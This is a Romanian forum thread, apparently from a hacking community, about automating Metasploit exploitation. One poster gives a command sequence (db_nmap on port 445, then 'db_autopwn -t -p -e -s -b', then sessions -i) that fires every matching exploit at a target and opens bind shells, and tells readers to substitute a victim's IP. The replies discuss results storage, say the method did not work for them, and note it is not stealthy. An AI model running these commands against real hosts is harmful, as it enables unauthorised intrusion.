Cum sa automatizam exploit-urile in Metasploit

[c0der]

#Exemplu avansat de automatizare a exploiturilor pe un anumit tip de ip, folosind comenzi din consola shell[terminal] in metasploit

# practic luam fiecare exploit din baza de date a metasploitului, si le testeaza pe serverul tinta

# ip ul 127.0.0.1 va fi folosit ca ip ul victimei - voi o sa puneti alt ip

# algoritmul "db_autopwn" are urmatoarele optiuni :

-t : show all matching exploit modules

-x : select modules based on vulnerability references

-p : select modules based on open ports

-e : launch exploits against all matched targets

-s : only obtain a single shell per target system

-r : use a reverse connect shell

-b : use a bind shell on a random port

-h : display this help text

_____________________________________________

Pasii care trebuiesc urmati:

./msfconsole

load db_postgres

db_create tester

db_hosts

db_nmap 127.0.0.1 -p 445

db_hosts

db_autopwn

db_autopwn -t -p -e -s -b

sessions -l

sessions -i 1

sper sa va fie de folos pt cei care utilizati metasploit.Numai Bine.

[moubik]

si rezultatele cum se salveaza?

[escalation666]

Rezultatele se salveaza in postgres...ca doar nu degeaba folosesti baza de date...daca te uiti prin scripturi pe acolo ai sa vezi exact cum se numeste...cu sessions -l vezi cate sesiuni active ai...si cu sessions -i intereactionezi cu ele....nu prea ai ce salva

Apropo de automatizarea asta....eu am incercat acu cateva luni in urma...si fara nici un rezultat valabil....exista cineva care o avut rezultate?

Asa...si ca o ultima completare de ex daca pui sa exploateze portul 80....nu ar fi stealth deloc, pentru ca ar incerca toate exploiturile pe care le are pentru portul 80, deci daca target-ul meu ruleaza un Apache, degeaba autopwn-ul va incerca exploituri de IIS de exemplu. Oricum is putin dezamagit de ultima versiune de framework pentru ca e putin buggy...

[moubik]

din cate auzisem metasploit V3 ar fi trebuit sa automatizeze scanarile.

asta e doar ce am auzit cat de adevarat e... nu prea